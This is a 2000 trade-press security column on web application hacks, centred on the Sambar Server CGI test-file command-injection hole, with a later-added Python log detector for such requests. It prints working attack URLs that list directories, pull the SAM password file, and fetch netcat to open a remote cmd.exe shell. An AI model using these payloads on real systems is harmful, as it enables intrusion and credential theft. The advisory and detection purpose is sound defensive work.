Security Watch: Application Hacks Grow

SAN MATEO (03/13/2000) - Unlike the recent DoS (denial of service) attacks on popular e-commerce Web sites, the art of application hacking is an elite skill.

Assessing a Web server along with its running software and the application's design, for example, and then formulating an attack based on possible weaknesses in design requires some significant thought and analysis, not to mention a thorough understanding of Web design and programming.

Unfortunately, much of this analysis requires a talent that most security administrators have not yet honed. Consider yourself forewarned: The number of application vulnerabilities is growing almost daily and there is no sign of it letting up. As administrators get smarter and harden their networks and systems, attackers are raising the stakes by moving up the stack and attacking the application itself. There is no time like the present to begin brushing up on your application hacking skills to find the holes in your network before some teenager does.

A few of the recent vulnerabilities have taken the fun out of Web hacking altogether. With a single command on one of these applications it is possible to execute remote commands; this reminds us that any system is one mistake away from complete compromise.

Sambar falls victim

After establishing a strong security record, the popular Windows NT and Windows 95/98 freeware Web server, Sambar Server from Sambar Technologies, has fallen victim to a devastating Web hack. Georgi Chorbadzhiiski and Nikolay Tsvetkov recently stumbled across a couple of CGI test files that can be used to execute any command on the target system. The files are Windows batch files named hello.bat and echo.bat and are included in the default installation of every Sambar version for NT that we've checked.

The real purpose behind including files like these in Web server distributions is to provide an easy way to confirm that CGI is working on a Web server. But this is precisely how many Web servers are compromised. Web server vendors will often include poorly written CGI programs in the distribution, making it easier to troubleshoot problems. And Sambar appears to be no exception to the rule.

What everyone fails to remember is that local command execution is an enormous problem. Once you can execute commands on a target system, the game is over.

The exploit is trivial to carry out. The syntax makes use of the usual "&" symbol as a parameter to the CGI script (in this case the batch file) and the "+" symbol as a space between parameters of your commands. By using this syntax, you can direct these CGI files to execute any command on the local system. The program execution choices are plentiful. Type the following in your browser to view the contents of any directory on the system:

http:///cgi-bin/hello.bat?&dir+c:\

Type the following to download the backup SAM (Security Accounts Manager) file:

http:///cgi-bin/hello.bat?&type+c:\winnt\repair\sam._

And finally, for the truly wicked, try this one to gain a command prompt:

http:///cgi-bin/hello.bat?&tftp+i++GET+nc.exe+c:\nc.exe&c:\nc.exe+-l+-d+-p+4000+-e+cmd.exe

The easy fix is to remove the offensive batch files from the /cgi-bin directory.
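Because this traffic rides over ordinary port 80 requests, the place a defender can still catch it is the Web server's access log. The script below is an added example, not code from the column or from Sambar: it parses constructed Common Log Format lines, flags any request that reaches hello.bat or echo.bat with a bare "&"-separated query segment (the "+"-for-space command syntax described above), and adds a check for whether the test files are still present in the cgi-bin directory (the directory path is a placeholder).

```python
import os
import re
from urllib.parse import unquote_plus, urlsplit

# Default Sambar CGI test files named in the column.
TEST_SCRIPTS = {"hello.bat", "echo.bat"}

# Constructed sample access log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Mar/2000:10:01:02 -0800] "GET /index.htm HTTP/1.0" 200 1432
10.0.0.9 - - [13/Mar/2000:10:01:09 -0800] "GET /cgi-bin/hello.bat?&dir+c:\\ HTTP/1.0" 200 512
10.0.0.7 - - [13/Mar/2000:10:02:00 -0800] "GET /cgi-bin/echo.bat?name=test HTTP/1.0" 200 64
10.0.0.9 - - [13/Mar/2000:10:02:31 -0800] "GET /CGI-BIN/Echo.bat?name=x&dir+c:\\ HTTP/1.0" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def find_cgi_injection(log_text):
    """Return (ip, script, injected_commands) for every request that reaches one
    of the default test batch files with a bare '&'-separated query segment.
    A segment without '=' is not a normal key=value parameter; it is the text
    the batch file would hand to the command interpreter ('+' decodes to a space)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        script = parts.path.rsplit("/", 1)[-1].lower()  # NT file names are case-insensitive
        if script not in TEST_SCRIPTS:
            continue
        injected = [unquote_plus(seg) for seg in parts.query.split("&")
                    if seg and "=" not in seg]
        if injected:
            hits.append((m.group("ip"), script, injected))
    return hits


def leftover_test_scripts(cgi_dir):
    """Mitigation check: which default test batch files still exist in cgi_dir."""
    return sorted(n for n in TEST_SCRIPTS
                  if os.path.isfile(os.path.join(cgi_dir, n)))


if __name__ == "__main__":
    for ip, script, cmds in find_cgi_injection(SAMPLE_LOG):
        print(f"{ip} -> {script}: {cmds}")
    # Placeholder path; point it at the server's real cgi-bin directory.
    print("still present:", leftover_test_scripts("PATH_TO_SAMBAR_CGI_BIN"))
```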

Finger server

A number of other application vulnerabilities have recently hit the wire, including the Finger Server, Microsoft FrontPage Personal Web server, Microsoft Index Server, and EZ Shopper 3.0.

The Finger Server (for NT and Unix), by Daniel Beckham, allows an attacker to remotely execute any command. The FrontPage Personal Web server is reported to allow an attacker to view any file on the system with the use of the doubledot bug (which is actually four dots "...."). We have not gotten it to work in Windows 98 with FrontPage 4.02.0690; however, Version 3.0.2.926 has been reported vulnerable.

Index Server was reported to have a similar hole that would allow someone to view any file on the system and learn the directory structure of the Web server. And finally, EZ Shopper 3.0 (canned e-commerce software), by the Alex Heiphetz Group, has reported holes in their loadpage.cgi and search.cgi scripts. These also allow an attacker to remotely execute commands.

The mistake many administrators make is in believing that these attacks can be prevented with firewalls or intrusion detection. They cannot. All the attacks work by exploiting a Web server, which means that the attack runs over standard port 80 (HTTP) traffic and cannot be easily distinguished from normal, everyday traffic.

Let us know at security_watch@infoworld.com what you are doing about your application vulnerabilities.

Stuart McClure is president/CTO and Joel Scambray is a managing principal at Rampart Security Group (www.ramsec.com). They have encountered numerous technologies during their 10 years in information security. They recently wrote the security book Hacking Exposed (Osborne McGraw-Hill).
